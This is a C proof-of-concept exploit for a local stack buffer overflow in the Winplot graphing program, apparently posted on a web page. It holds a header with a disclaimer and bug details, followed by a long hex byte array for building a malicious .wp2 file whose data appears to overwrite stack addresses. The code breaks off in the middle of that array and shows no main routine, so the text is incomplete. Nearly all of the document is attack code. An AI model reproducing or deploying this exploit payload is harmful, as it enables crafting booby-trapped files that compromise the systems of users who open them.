/* |
DISCLAIMER |
|
THIS PROGRAM IS NOT INTENDED TO BE USED ON OTHER COMPUTERS AND IT IS DESTINED FOR PERSONAL RESEARCH ONLY!!!! |
The programs are provided as is without any guarantees or warranty. |
The author is not responsible for any damage or losses of any kind caused by the use or misuse of the programs. |
The author is under no obligation to provide support, service, corrections, or upgrades to the free software programs. |
|
Author: fl0 fl0w |
Software: Winplot |
Dl link: http://math.exeter.edu/rparris/peanut/wp32z.exe |
|
Afected Versions: compiled 7 june 2010 |
Remote: No |
Local: Yes |
Class: Boundary Condition Error |
Bug: Stack buffer overflow |
Afected software: Windows 95/98/ME/2K/XP/Vista/7 |
Fix: No fix |
Compiler: gcc version 3.4.4 (cygming special, gdc 0.12, using dmd 0.125) |
Advice: To avoid any problems under Windows use cygwin console. |
|
The .C code: |
*/ |
#include<stdio.h> |
typedef int i32; |
typedef char i8; |
typedef short i16; |
typedef unsigned int ui32; |
#define CHARS "0123456789ABCDEFGHIJKLMNOPQRST" \ |
"UVWXYZabcdefghijklmnopqrstuvwxyz" |
#define MEM_ALOC(tip,n) (tip*)malloc(sizeof(tip)*n) |
#define POC_NAME "pocfile.wp2" |
#define TITLE "-Winplot 2010 buffer overflow poc\n" \ |
"-by fl0 fl0w\n" \ |
"-File built\n" |
#define WP2 "\x49\x03\x00\x00\x24\x00\x00\x00\x31\x01\x00\x00\x95\x00\x00\x00\x80\x02\x00\x00" \ |
"\x80\x02\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x3d\x00\x00\x00\xd9\xff\xff\xff" \ |
"\x2c\x01\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x0a\x00\x00\x00\x0f\x00\x00\x00\x2b\xd0\x28\x01\x49\x1e\x29\x01\x00\x00\x00\x00" \ |
"\x0c\x00\x00\x00\x0a\x00\x00\x00\x0a\x00\x00\x00\x08\x00\x00\x00\x0c\x00\x00\x00" \ |
"\x0a\x00\x00\x00\x0a\x00\x00\x00\x0a\x00\x00\x00\x0a\x00\x00\x00\x0a\x00\x00\x00" \ |
"\xf0\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x01\x00\x00" \ |
"\x00\x00\x00\x00\x08\x02\x01\x31\x43\x6f\x75\x72\x69\x65\x72\x20\x4e\x65\x77\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\xf3\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x01\x00\x00" \ |
"\x00\x00\x00\x02\x08\x02\x01\x31\x53\x79\x6d\x62\x6f\x6c\x00\x20\x4e\x65\x77\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\xf3\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x01\x00\x00" \ |
"\x00\x00\x00\x00\x08\x02\x01\x31\x43\x6f\x75\x72\x69\x65\x72\x20\x4e\x65\x77\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\xf5\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x01\x00\x00" \ |
"\x00\x00\x00\x00\x08\x02\x01\x31\x43\x6f\x75\x72\x69\x65\x72\x20\x4e\x65\x77\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\xf0\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x01\x00\x00" \ |
"\x00\x00\x00\x00\x08\x02\x01\x02\x54\x69\x6d\x65\x73\x00\x72\x20\x4e\x65\x77\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\xf3\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x01\x00\x00" \ |
"\x00\x00\x00\x00\x08\x02\x01\x02\x54\x69\x6d\x65\x73\x00\x72\x20\x4e\x65\x77\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\xf3\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x01\x00\x00" \ |
"\x00\x00\x00\x00\x08\x02\x01\x31\x43\x6f\x75\x72\x69\x65\x72\x20\x4e\x65\x77\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\xf3\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x01\x00\x00" \ |
"\x00\x00\x00\x00\x08\x02\x01\x31\x43\x6f\x75\x72\x69\x65\x72\x20\x4e\x65\x77\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\xf3\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x01\x00\x00" \ |
"\x00\x00\x00\x00\x08\x02\x01\x31\x43\x6f\x75\x72\x69\x65\x72\x20\x4e\x65\x77\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\xf3\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x01\x00\x00" \ |
"\x00\x00\x00\x00\x08\x02\x01\x31\x43\x6f\x75\x72\x69\x65\x72\x20\x4e\x65\x77\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x0c\xf2\x12\x00\x5d\xdd\x52\x00\x08\x80\x55\x00\x00\x00\x00\x00\x00\x0c\xf2\x12" \ |
"\x00\x5d\xdd\x52\x00\x08\x80\x55\x00\x00\x00\x00\x00\x00\x0c\xf2\x12\x00\x5d\xdd" \ |
"\x52\x00\x08\x80\x55\x00\x00\x00\x00\x00\x00\x0c\xf2\x12\x00\x5d\xdd\x52\x00\x08" \ |
"\x80\x55\x00\x00\x00\x00\x00\x00\x01\x00\x04\x00\x06\x00\x00\x00\x04\x00\x06\x00" \ |
"\x04\x00\x04\x00\x00\x00\x00\x00\x15\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\xff\xff\xff\x00\xff\x00\xff\x00\xff\xff\x00\x00\xff\x00\x00\x00\x00\xbf" \ |
"\x3f\x00\x00\x00\xff\x00\x00\x7f\x7f\x00\xff\x7f\x00\x00\xff\x00\x7f\x00\xa0\x2f" \ |
"\x00\x00\x00\xff\xff\x00\xbf\xbf\x7f\x00\x7f\x00\x7f\x00\x20\xff\x00\x00\xff\x7f" \ |
"\x7f\x00\x87\x87\x00\x00\x00\x3c\xa0\x00\xe0\xe0\xe0\x00\xc0\xc0\xc0\x00\xa0\xa0" \ |
"\xa0\x00\x80\x80\x80\x00\x60\x60\x60\x00\x40\x40\x40\x00\xbf\x00\x3f\x00\x7e\xde" \ |
"\xff\x00\xff\xcc\xcc\x00\xff\x7e\xde\x00\xff\xde\x7e\x00\xde\xff\x7e\x00\x7e\xff" \ |
"\xde\x00\xff\xff\xbf\x00\xff\xbf\xff\x00\xbf\xff\xff\x00\xff\xff\xde\x00\xff\xde" \ |
"\xff\x00\xde\xff\xff\x00\xb1\xde\xd4\x00\xb1\xd4\xde\x00\xd4\xb1\xde\x00\xd4\xde" \ |
"\xb1\x00\xde\xb1\xd4\x00\xde\xd4\xb1\x00\xbf\xf1\xde\x00\xbf\xde\xf1\x00\xde\xf1" \ |
"\xbf\x00\xde\xbf\xf1\x00\xf1\xde\xbf\x00\xf1\xbf\xde\x00\xff\x96\xea\x00\x96\xea" \ |
"\xff\x00\xcc\xcc\xcc\x00\xc8\x70\x00\x00\xde\xcd\x00\x00\xde\x68\x20\x00\x14\x82" \ |
"\x28\x00\xc0\x00\xa0\x00\xd4\x28\x28\x00\x50\x84\xb0\x00\x64\xa0\xc8\x00\x14\x64" \ |
"\x14\x00\x05\x00\x7d\x00\x00\x00\x01\x00\x01\x00\x01\x00\x0a\x00\x05\x00\x02\x00" \ |
"\xff\xff\x64\x00\x03\x00\x3c\x00\x07\x00\x0f\x00\x01\x00\x03\x00\x08\x00\x0c\x00" \ |
"\x1e\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x03\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" \ |
"\x70\x00\x0c\x00\x14\x00\x00\x00\x00\x00\x7b\x03\xff\xff\x32\x00\x00\x00\xb0\x00" \ |
"\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x01\x01\x00\x00\x00\x00\x01\x01\x01\x00\x00\x00\x00\x00" \ |
"\x00\x01\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" \ |
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0" \ |
"\x01\x40\x00\x00\x00\x00\x00\x00\x00\xa0\x01\xc0\x00\x00\x00\x00\x00\x00\x00\xa0" \ |
"\x01\x40\x78\xb5\xb8\x09\xf3\xbb\x5a\x94\x01\xc0\x78\xb5\xb8\x09\xf3\xbb\x5a\x94" \ |
"\x01\x40\x00\x00\x00\x00\x00\x00\x00\x80\xff\x3f\x00\x00\x00\x00\x00\x00\x00\x80" \ |
"\xff\x3f\x00\x00\x00\x00\x00\x00\x00\x80\xff\x3f\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x04\x40\x00\x00\x00\x00\x00\x00\x00\xa0" \ |
"\x05\x40\x00\x00\x00\x00\x00\x00\x00\xf0\x04\x40\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x40\x00\x00\x00\x00\x00\x00\x00\x80" \ |
"\x00\x40\x00\x00\x00\x00\x00\x00\x00\x80\x00\x40\x00\x30\x33\x33\x33\x33\x33\xb3" \ |
"\xfe\x3f\x00\xd0\xcc\xcc\xcc\xcc\xcc\xcc\xfb\x3f\x00\x00\x00\x00\x00\x00\x00\xa0" \ |
"\x01\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa8\x5e\xdf\x9b\x4f\x77\xd6" \ |
"\xfb\x3f\x00\x48\xe1\x7a\x14\xae\x47\x81\xff\x3f\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xff\x3f\x00\x00\x00\x00\x00\x00\x00\xc0" \ |
"\xfe\x3f\x7a\x00\x00\x00\x00\x00\xf0\xf4\x12\x00\x01\x00\x00\x00\x00\x00\x00\x00" \ |
"\x80\xf6\x12\x00\xd5\x4a\x40\x00\x14\x03\x1c\x00\xf0\xf4\x12\x00\x30\x04\x54\x00" \ |
"\xf0\x8f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0" \ |
"\x01\x40\x00\x00\x00\x00\x00\x00\x00\xfa\x08\x40\x00\xd0\xcc\xcc\xcc\xcc\xcc\xcc" \ |
"\xfb\x3f\x00\x00\x00\x00\x00\x00\x40\x9c\x0c\x40\x00\x00\x00\x00\x00\x00\x00\xc8" \ |
"\x07\x40\x00\x00\x00\x00\x00\x00\x00\x96\x06\x40\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xff\x3f\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x01\x40\x00\x00\x00\x00\x00\x00\x00\xfa" \ |
"\x08\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0" \ |
"\x01\x40\x00\x00\x00\x00\x00\x00\x00\xc8\x05\x40\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x01\x40\x00\x00\x00\x00\x00\x00\x00\xc8" \ |
"\x05\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80" \ |
"\x00\x40\x00\x00\x00\x00\x00\x00\x00\x80\x00\x40\x00\x00\x00\x00\x00\x00\x00\x80" \ |
"\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x01\x40\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
|
0 条评论。